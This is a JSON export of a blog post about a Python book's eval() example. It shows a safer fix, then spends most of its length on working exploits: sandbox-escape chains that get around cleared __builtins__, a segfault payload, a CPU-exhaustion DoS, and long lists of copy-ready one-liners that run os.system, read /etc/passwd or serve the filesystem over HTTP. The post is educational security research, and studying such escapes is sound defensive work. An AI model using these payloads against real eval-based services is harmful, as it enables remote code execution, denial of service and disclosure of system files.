{"id":584,"date":"2012-10-25T14:50:43","date_gmt":"2012-10-25T13:50:43","guid":{"rendered":"http:\/\/www.floyd.ch\/?p=584"},"modified":"2023-05-31T08:25:33","modified_gmt":"2023-05-31T07:25:33","slug":"exploiting-pythons-eval","status":"publish","type":"post","link":"https:\/\/www.floyd.ch\/?p=584","title":{"rendered":"Exploiting Python’s Eval"},"content":{"rendered":"

For those of you just interested in the exploiting part, scroll down to “Exploiting<\/strong>“.<\/p>\n

I’m reading the following book right now:<\/p>\n

Programming Python, Fourth Edition, by Mark Lutz (O’Reilly). Copyright 2011 Mark Lutz, 978-0-596-15810-1<\/p><\/blockquote>\n

Example 1-22 on page 38\/39 reads as following:<\/p>\n

\r\nme$ cd PP4E\/Preview\/\r\nme$ cat peopleinteract_update.py\r\n# interactive updates\r\nimport shelve\r\nfrom person import Person\r\nfieldnames = ('name', 'age', 'job', 'pay')\r\n\r\ndb = shelve.open('class-shelve')\r\nwhile True:\r\n    key = input('\\nKey? => ')\r\n    if not key: break\r\n    if key in db:\r\n        record = db[key]                      # update existing record\r\n    else:                                     # or make\/store new rec\r\n        record = Person(name='?', age='?')    # eval: quote strings\r\n    for field in fieldnames:\r\n        currval = getattr(record, field)\r\n        newtext = input('\\t[%s]=%s\\n\\t\\tnew?=>' % (field, currval))\r\n        if newtext:\r\n            setattr(record, field, eval(newtext))\r\n    db[key] = record\r\ndb.close()\r\n<\/pre>\n
Of course I saw that “eval”, so I immediately stopped reading the book and started reading about how I could exploit this little Python program. The book doesn’t mention that this example could be a security problem, but it looks like they wanted to add a comment, because on page 49 it reads:<\/p>\n
As mentioned previously, this is potentially dangerous if someone sneaks some malicious cod into our shelve, but we’ll finesse such concerns for now.<\/p><\/blockquote>\n
In my opinion it would be better to show a programmer how easy it is to specify a whitelist of characters (eg. say a-zA-Z0-9 and the single quote). From a security perspective, incorrect or insufficient input filtering is very dangerous. Although most of the time not the root cause, input filtering can help to prevent buffer overflows, XSS, SQL injection and most other injections. Whitelisting in Python would be done as following:<\/p>\n
\r\nimport string\r\nwhitelist = string.ascii_letters + string.digits + "' "\r\nnewtext = ''.join(c for c in newtext if c in whitelist)\r\n<\/pre>\n
Of course this whitelist would not cover Unicode characters. So the filter could be changed to a blacklist filter, which allows all Unicode characters, which should still be pretty safe (although blacklists are bad practice):<\/p>\n
\r\nimport string\r\nwhitelist = string.ascii_letters + string.digits + "' "\r\nnewtext = ''.join(c for c in newtext if c in whitelist or ord(c) > 127)\r\n<\/pre>\n
Of course this is just a workaround, the proper solution would be not to use the eval function. Instead all the input should be treated as strings and only fields with integers (age and pay) should be parsed to integers. The following code is the proper solution for the above example:<\/p>\n
\r\nme$ cd PP4E\/Preview\/\r\nme$ cat peopleinteract_update.py\r\n# interactive updates\r\nimport shelve\r\nfrom person import Person\r\nfieldnames = ('name', 'age', 'job', 'pay')\r\nnumerical_fieldnames = ('age', 'pay')\r\n\r\ndb = shelve.open('class-shelve')\r\nwhile True:\r\n    key = raw_input('\\nKey? => ')\r\n    if not key: break\r\n    if key in db:\r\n        record = db[key]                      # update existing record\r\n    else:                                     # or make\/store new rec\r\n        record = Person(name='?', age='?')\r\n    for field in fieldnames:\r\n        currval = getattr(record, field)\r\n        newtext = raw_input('\\t[%s]=%s\\n\\t\\tnew?=>' % (field, currval))\r\n        newtext = int(newtext) if field in numerical_fieldnames else newtext\r\n        if newtext:\r\n            setattr(record, field, newtext)\r\n    db[key] = record\r\ndb.close()\r\n<\/pre>\n
Exploiting<\/strong><\/p>\n
So let’s talk about exploiting the first example. I soon found out that the example would be very easy to exploit. For example the exit function is interpreted by eval and the program quits:<\/p>\n
\r\nme$ python3.3 peopleinteract_update.py\r\n\r\nKey? => tom\r\n\t[name]=56\r\n\t\tnew?=>exit()\r\nme$\r\n<\/pre>\n
So I read an article<\/a> about the problem. I found this little code example, which can be used to execute something on your system (Unix example):<\/p>\n
\r\n$ python3.3 peopleinteract_update.py\r\n\r\nKey? => tom\r\n\t[name]=56\r\n\t\tnew?=>__import__('os').system('echo hello, I am a command execution')\r\nhello, I am a command execution\r\n\t[age]=mgr\r\n\t\tnew?=>\r\n<\/pre>\n
As you see, the echo command is executed and printed on the next line. I told myself that was to easy and I wanted to exploit the program in harder circumstances. As described in that article, some people try to “secure” an eval call by overwriting the __builtins__ of Python. So let’s assume the line with eval in the example 1-22 looks as following:<\/p>\n
\r\nsetattr(record, field, eval(newtext, {'__builtins__':{}}))\r\n<\/pre>\n
To clear the builtins is considered a “security measure” for a lot of people, but as described in the article above it just makes it harder to exploit, not impossible. So I wanted to try that segmentation fault technique in the article on the example. It worked well for Python 2.7:<\/p>\n
\r\n$ python\r\nPython 2.7.3 (default, Apr 19 2012, 00:55:09)\r\n[GCC 4.2.1 (Based on Apple Inc. build 5658) (LLVM build 2335.15.00)] on darwin\r\nType "help", "copyright", "credits" or "license" for more information.\r\n>>> s = """\r\n... (lambda fc=(\r\n...     lambda n: [\r\n...         c for c in\r\n...             ().__class__.__bases__[0].__subclasses__()\r\n...             if c.__name__ == n\r\n...         ][0]\r\n...     ):\r\n...     fc("function")(\r\n...         fc("code")(\r\n...             0,0,0,0,"KABOOM",(),(),(),"","",0,""\r\n...         ),{}\r\n...     )()\r\n... )()\r\n... """\r\n>>> eval(s, {'__builtins__':{}})\r\nSegmentation fault: 11\r\nme$\r\n<\/pre>\n
But they changed the constructor for Python 3 for the code object. So if you run the same code on Python 3.3 it will output that it needs 13 arguments:<\/p>\n
\r\n$ python3.3\r\nPython 3.3.0rc2 (default, Sep  9 2012, 04:29:34)\r\n[GCC 4.2.1 Compatible Apple Clang 3.1 (tags\/Apple\/clang-318.0.58)] on darwin\r\nType "help", "copyright", "credits" or "license" for more information.\r\n>>> #same s as before\r\n...\r\n>>> eval(s, {'__builtins__':{}})\r\nTraceback (most recent call last):\r\n  File "", line 1, in\r\n  File "", line 3, in\r\n  File "", line 11, in\r\nTypeError: code() takes at least 13 arguments (12 given)\r\n>>>\r\n<\/pre>\n
So because the book is about Python 3, we have to change the arguments for the code object constructor. But which arguments does it take? To find that out I started a Python 3 console and typed in the following:<\/p>\n
\r\n>>> def foo(): pass\r\n...\r\n>>> help(type(foo.__code__))\r\n<\/pre>\n
We get a nice description of the constructor (__init__ method) of the code object and the message that this isn’t for the faint of heart. Fine for me. We get the following argument description for the constructor:<\/p>\n
\r\ncode(argcount, kwonlyargcount, nlocals, stacksize, flags, codestring,\r\n |        constants, names, varnames, filename, name, firstlineno,\r\n |        lnotab[, freevars[, cellvars]])\r\n<\/pre>\n
There is no “kwonlyargcount” for Python 2.7, so with an additional 0 in the argument list and specifying two literals as “bytes” instead of “strings”, we get a Python 3 segmentation fault:<\/p>\n
\r\ns = """\r\n(lambda fc=(\r\n    lambda n: [\r\n        c for c in\r\n            ().__class__.__bases__[0].__subclasses__()\r\n            if c.__name__ == n\r\n        ][0]\r\n    ):\r\n    fc("function")(\r\n        fc("code")(\r\n            0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b""\r\n        ),{}\r\n    )()\r\n)()\r\n"""\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
Now of course we want to feed it to the example program. So removing the new lines and replacing the three double quotes with one single quote we get:<\/p>\n
\r\ns = '(lambda fc=( lambda n: [ c for c in  ().__class__.__bases__[0].__subclasses__()  if c.__name__ == n ][0] ): fc("function")( fc("code")( 0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"" ),{} )())()'\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
Ok, those two lines still work fine on the interactive Python 3 shell (and by removing one of the first 0 arguments for the code init method it will also work in Python 2.7). Can we exploit the test application now? Yes we can:<\/p>\n
\r\nme$ python3.3 peopleinteract_update.py\r\n\r\nKey? => abc\r\n\t[name]=?\r\n\t\tnew?=>(lambda fc=( lambda n: [ c for c in  ().__class__.__bases__[0].__subclasses__()  if c.__name__ == n ][0] ): fc("function")( fc("code")( 0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"" ),{} )())()\r\nSegmentation fault: 11\r\nme$\r\n<\/pre>\n
Ok, seg faulting is fine, but what about executing real code? For that we have to go a little bit back. First, let’s try again in Python 2.7 with the cool trick described in an article on reddit<\/a>. If we run the following code in a python interactive interpreter, it will show us the help page (of the help command itself):<\/p>\n
\r\ns = """\r\n(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):\r\n    __builtins__['help'](__builtins__['help'])\r\n)()\r\n"""\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
So let’s see the builtins we get back with this method:<\/p>\n
\r\n>>> a = [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__.keys()>>> a.sort()\r\n>>> a\r\n['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '_', '__debug__', '__doc__', '__import__', '__name__', '__package__', 'abs', 'all', 'any', 'apply', 'basestring', 'bin', 'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'copyright', 'credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', 'execfile', 'exit', 'file', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', 'intern', 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'long', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode', 'vars', 'xrange', 'zip']\r\n<\/pre>\n
For example we can now print something:<\/p>\n
\r\ns = """\r\n(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):\r\n    __builtins__['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')\r\n)()\r\n"""\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
We can also exit the interpreter form within the eval:<\/p>\n
\r\ns = """\r\n(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):\r\n    __builtins__['exit']()\r\n)()\r\n"""\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
We can also delay the answer of the interpreter (takes about 10 seconds on my machine):<\/p>\n
\r\ns = """\r\n(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):\r\n    __builtins__['sum'](__builtins__['xrange'](-999999999,99999999))\r\n)()\r\n"""\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
Of course if you add some more 9s to those numbers, you can DoS the interpreter. <\/p>\n
But if we try to read a file, the restricted mode gets hit on my machine. It seems<\/a> the restricted mode is “entered when the builtins in main_dict are not the same as the interpreter’s builtins”. Here’s the corresponding code:<\/p>\n
\r\ns = """\r\n(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):\r\n    __builtins__['print'](__builtins__['file']('\/etc\/passwd').read())\r\n)()\r\n"""\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
The console answers with:<\/p>\n
\r\nTraceback (most recent call last):\r\n  File "", line 1, in\r\n  File "", line 2, in\r\n  File "", line 3, in\r\nIOError: file() constructor not accessible in restricted mode\r\n<\/pre>\n
Hmm, ok. Strange, because we can execute commands on the system:<\/p>\n
\r\ns = """\r\n(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):\r\n    __builtins__['print'](__builtins__['__import__']('os').system('cat \/etc\/passwd'))\r\n)()\r\n"""\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
So I don’t really care if I can read files on the system, I would simply execute a reverse shell if this would be an exploitable web service. My next try was the subprocess module, but no luck:<\/p>\n
\r\ns = """\r\n(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):\r\n__builtins__['print'](__builtins__['__import__']('subprocess').Popen('cat \/etc\/passwd', shell=True))\r\n)()\r\n"""\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
\r\nTraceback (most recent call last):\r\nFile "", line 1, in\r\nFile "", line 2, in\r\nFile "", line 3, in\r\nRuntimeError: cannot unmarshal code objects in restricted execution mode\r\n<\/pre>\n
Ok, so no subprocesses and no reading of files. Let’s simply do some cool stuff with the system module, like showing \/etc\/passwd above. Let’s start an HTTP Server which serves a directory listing of the root directory on port 8000:<\/p>\n
\r\ns = """\r\n(lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__):\r\n__builtins__['print'](__builtins__['__import__']('os').system('cd \/; python -m SimpleHTTPServer'))\r\n)()\r\n"""\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
I guess we’re pretty clear that from this point on we would have control over the machine, which is running the eval command. Here are the payloads (in several different versions) as one liners for Python 2.7. The file, open and fileinput payload fails because of the IOError of the restricted mode when the builtins are different, os.popen fails with a permission denied for me. The rest works on my machine:<\/p>\n
\r\nprint('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')\r\nexit()\r\nsum(xrange(-999999999,99999999))\r\n\r\nfile('\/etc\/passwd').read()\r\nopen('\/etc\/passwd').read()\r\n__import__['fileinput'].input('\/etc\/passwd')\r\n__import__['os'].system('cat \/etc\/passwd')\r\n__import__['os'].popen('\/etc\/passwd', 'r').read()\r\n__import__['os'].system('cd \/; python -m SimpleHTTPServer')\r\n\r\nprint(file('\/etc\/passwd').read())\r\nprint(open('\/etc\/passwd').read())\r\nprint(__import__['fileinput'].input('\/etc\/passwd'))\r\nprint(__import__['os'].system('cat \/etc\/passwd'))\r\nprint(__import__['os'].popen('\/etc\/passwd', 'r').read())\r\nprint(__import__['os'].system('cd \/; python -m SimpleHTTPServer'))\r\n\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['exit']()\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['sum']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['xrange'](-999999999,99999999))\r\n\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('\/etc\/passwd').read()\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('\/etc\/passwd').read()\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('\/etc\/passwd')\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat \/etc\/passwd')\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('\/etc\/passwd', 'r').read()\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd \/; python -m SimpleHTTPServer')\r\n\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('\/etc\/passwd').read())\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('\/etc\/passwd').read())\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('\/etc\/passwd'))\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat \/etc\/passwd'))\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('\/etc\/passwd', 'r').read())\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd \/; python -m SimpleHTTPServer'))\r\n<\/pre>\n
Ok, what about Python 3 now? I haven’t found a reliable way to restore the builtins on Python 3. The following code is taken from Reddit<\/a> and should work in general:<\/p>\n
\r\nlookup = lambda n: [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == n][0]\r\ntry:\r\n    lookup('Codec')().decode('')\r\nexcept lookup('BaseException') as e:\r\n    del lookup\r\n    __builtins__ = e.__traceback__.tb_next.tb_frame.f_globals['__builtins__']\r\n<\/pre>\n
But because try\/except blocks are not allowed to be inlined<\/a> and eval can not parse multiple lines (SyntaxError: invalid syntax for try), this technique can’t be used:<\/p>\n
\r\ns = """try:\r\n    int("a")\r\nexcept:\r\n    print(123)\r\n"""\r\neval(s, {'__builtins__':{}})\r\n<\/pre>\n
So we would have to find another way to restore the builtins or we have to properly build a code object like we did for the segmentation fault above. I guess another thing for my TODO list.
\nUPDATE 19th Feb 2013:
\nTalked to Ned, he wrote a nice script to find builtins<\/a>. And here we go for python 3.3:<\/p>\n
\r\n>>> x = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']('aaaa')"\r\n>>> eval(x, {'__builtins__':{}})\r\naaaa\r\n>>>\r\n<\/pre>\n
So the payloads for python 3 are:<\/p>\n
\r\nprint('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')\r\nexit()\r\nsum(xrange(-999999999,99999999))\r\n\r\nfile('\/etc\/passwd').read()\r\nopen('\/etc\/passwd').read()\r\n__import__['fileinput'].input('\/etc\/passwd')\r\n__import__['os'].system('cat \/etc\/passwd')\r\n__import__['os'].popen('\/etc\/passwd', 'r').read()\r\n__import__['os'].system('cd \/; python -m SimpleHTTPServer')\r\n\r\nprint(file('\/etc\/passwd').read())\r\nprint(open('\/etc\/passwd').read())\r\nprint(__import__['fileinput'].input('\/etc\/passwd'))\r\nprint(__import__['os'].system('cat \/etc\/passwd'))\r\nprint(__import__['os'].popen('\/etc\/passwd', 'r').read())\r\nprint(__import__['os'].system('cd \/; python -m SimpleHTTPServer'))\r\n\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT')\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['exit']()\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['sum']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['xrange'](-999999999,99999999))\r\n\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['file']('\/etc\/passwd').read()\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['open']('\/etc\/passwd').read()\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('fileinput').input('\/etc\/passwd')\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cat \/etc\/passwd')\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').popen('\/etc\/passwd', 'r').read()\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cd \/; python -m SimpleHTTPServer')\r\n\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['file']('\/etc\/passwd').read())\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['open']('\/etc\/passwd').read())\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('fileinput').input('\/etc\/passwd'))\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cat \/etc\/passwd'))\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').popen('\/etc\/passwd', 'r').read())\r\n[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cd \/; python -m SimpleHTTPServer'))\r\n<\/pre>\n
Of course now that you have Ned’s script, you can simply find other places where the builtins live, the Pattern is just one example. E.g. if one of theses strings ever gets blacklisted (think web application firewall).<\/p>\n","protected":false},"excerpt":{"rendered":"
For those of you just interested in the exploiting part, scroll down to “Exploiting“. I’m reading the following book right now: Programming Python, Fourth Edition, by Mark Lutz (O’Reilly). Copyright 2011 Mark Lutz, 978-0-596-15810-1 Example 1-22 on page 38\/39 reads … Continue reading →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18],"tags":[97,98,20,96],"class_list":["post-584","post","type-post","status-publish","format-standard","hentry","category-coding","tag-builtins","tag-eval","tag-python","tag-restricted-mode"],"_links":{"self":[{"href":"https:\/\/www.floyd.ch\/index.php?rest_route=\/wp\/v2\/posts\/584","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.floyd.ch\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.floyd.ch\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.floyd.ch\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.floyd.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=584"}],"version-history":[{"count":38,"href":"https:\/\/www.floyd.ch\/index.php?rest_route=\/wp\/v2\/posts\/584\/revisions"}],"predecessor-version":[{"id":1366,"href":"https:\/\/www.floyd.ch\/index.php?rest_route=\/wp\/v2\/posts\/584\/revisions\/1366"}],"wp:attachment":[{"href":"https:\/\/www.floyd.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=584"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.floyd.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=584"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.floyd.ch\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=584"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}